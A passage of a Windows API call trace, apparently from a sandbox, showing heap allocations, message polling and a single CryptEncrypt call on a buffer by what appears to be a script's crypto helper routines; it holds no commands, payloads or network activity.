wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.415] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0226.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0226.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0226.416] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0226.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0226.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0226.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0226.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0226.416] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.417] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0226.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0226.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0226.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0226.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0226.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.418] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0226.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24f6) returned 0x2f14818 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56588 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0226.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0226.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0226.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51370, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0226.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.422] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0226.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0226.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.423] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x24f6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x24f8) returned 1 [0226.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0226.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.423] CharLowerBuffW (in: lpsz="byte[9464]", cchLength=0xa | out: lpsz="byte[9464]") returned 0xa [0226.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0226.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.424] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0226.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0226.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0226.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0226.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.425] 